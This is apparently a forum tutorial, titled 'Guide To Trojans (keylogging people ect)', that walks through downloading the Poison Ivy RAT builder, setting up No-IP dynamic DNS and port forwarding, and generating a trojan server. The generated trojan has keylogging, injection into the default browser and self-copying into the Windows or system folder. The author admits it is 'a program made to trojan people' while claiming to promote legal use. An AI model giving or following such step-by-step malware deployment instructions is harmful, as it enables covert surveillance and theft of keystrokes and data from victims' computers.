[Tutorial] Guide To Trojans (keylogging people ect) (Poison Ivy 2.3.2)

Esk0

New Member
First Download Poison Ivy and Run it.

Download:
Download Mirror 1: OpenDNS

Download Mirror 2: OpenDNS

Poison Ivy is a RAT, a remote administration tool. Which means that you use it to control your other computers. I've been using it for about a year or so. It's just about the only thing that I can make a guide about - so I decided to do so. Note: There *is* a guide included in the download, however, it doesn't include setting up a No-IP account. And there is other guides on this out there - none here though. Hell, I don't even know if anyone will find this useful, but I'm writing it out anyway - I'm bored. It is however not ripped off - I won't steal others screenshots/content. Sorry if you find it too simple(insulting). Or too hard.

IN THIS GUIDE I'M PROMOTING IT FOR LEGAL USE.

Why you would want to use it:
You could setup your home computer to start/stop autobuying while being at work. And do all sorts of other things as well. Screenshots, webcam, keylogger, microphone recorder, it's all there. Limited by the computers upload speed obviously though.

Things you'll need to do:
Download Poison Ivy 2.3.0 (Newest Version)
Get a No-IP account (eliminates the need for a static ip)
Client Computer and a Server Computer
Port Forward the port you want to use trough your router.
noip1lu4.th.jpg



Lets just start with signing up for a No-IP account. Just go to the link, register, enter all details, and click the activation link you get in your email. Then, when you are logged in, you click "Hosts/Redirects" and then "Add". Under hostname, write w/e you want, and choose whatever free domain you want. Check the DNS Host (A). It should be checked already. That's all you need to click. Now you can create the host by clicking create host.
noip2bx2.th.jpg


Time to download it. Click the download tab and choose your operating system. Then download and open it. You won't need the options right now, but there are useful stuff there, amongst other things proxy support. Click edit at the right top side of the screen, enter your email and password. Now check the No-IP server you created and it will be forwarded to your ip. Just keep the program running and it'll update automatically if you get a new ip(if the router restarts etc).
pi230lz6.th.jpg



Now, download Poison Ivy with the link above if you haven't already.(It's NOT a virus). When you open it up it should look like this:
Click on new server.
pi2302zh3.th.jpg



Click on new profile. Name it whatever you want.
http://img529.imageshack.us/img529/8873/pi2303ia5.th.jpg


1. Click on add. The address is currently set to your local IP.
2. Change the IP address to your already made No-IP address, and specify a port of your choice. I usually just use a port between 7001-7008. You'll need to portforward this port, and also remember it for later(or just check back for it later)
3. Click ok.
4. Assign an ID. Whatever you want it to be named.
5. Assign a group to the ID. Again, whatever you want it to be named.
6. Assign a password - this is important, remember it.
7. Click next.
pi2304vn4.th.jpg


1. Check the box, and click random. Nothing else.
2. Check copy file, check either windows or the system folder. Name it something that ends with .exe
3. Melt would make it dissapear upon execution, since this guide is for legal use, I don't see any use for it. Check keylogger if you want. You won't need persistence.
4. Click next.
http://img181.imageshack.us/img181/3765/pi2305kj9.th.jpg[/img

Don't mess with these settings. Unless you know what you're doing, they're fine as they are. Except the Inject option. You can specify another process if you want. If not, it will inject into the default browser. Click next.
[img]http://img529.imageshack.us/img529/314/pi2306qr5.th.jpg

1. Click generate.
2. Name it and save it.
3. Click ok.
4. Click new client(back at the main menu again)
pi2307lf5.th.jpg


1. Specify the port from before.
2. Same password as you set before, no need to check the box above.
3. Click start.
http://img529.imageshack.us/img529/3097/pi2308cr1.th.jpg[img]

You should now have the screen above. Execute the .exe file at your computer of choice(your own ones), and you will get access to it trough this menu. This is for example great for controlling your home computer from work. As for two computers behind the same router.. that gets a little harder. Haven't had the chance to test for myself yet. The server file is classified as a trojan, don't be alarmed by this.

Don't be alarmed if your anitvirus's go crazy when you download this. This is a program made to trojan people You AV's will detect this and try and delete it.

[b]Download: [/b]
Download Mirror 1: [url=http://rapidshare.com/files/167860557/PI2.3.2.rar.html]OpenDNS[/url]

Download Mirror 2: [url=http://www.megaupload.com/?d=FWFR72IC]OpenDNS[/url]
 

Similar threads

Back
Top